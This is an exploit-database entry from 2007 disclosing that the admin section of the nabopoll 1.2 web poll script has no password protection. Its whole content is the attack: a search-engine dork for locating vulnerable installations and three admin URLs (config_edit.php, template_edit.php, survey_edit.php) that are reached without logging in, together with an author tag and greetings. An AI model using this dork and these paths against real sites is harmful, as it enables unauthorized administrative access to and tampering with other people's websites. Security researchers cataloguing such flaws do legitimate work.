id: 1499
date: 02/13/2007
title: nabopoll 1.2 Remote Unprotected Admin Section Vulnerability
author: sn0oPy
cves: 

===========================================================
nabopoll 1.2 Remote Unprotected Admin Section Vulnerability
===========================================================



* nabopoll 1.1.2 sensitive file (admin without password)

* By : sn0oPy

* Risk : high

* site : http://nabocorp.com/

* Dork : inurl:"nabopoll/"

* exploit :

acces without password to :

http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).


#  0day.today [2023-03-26]  #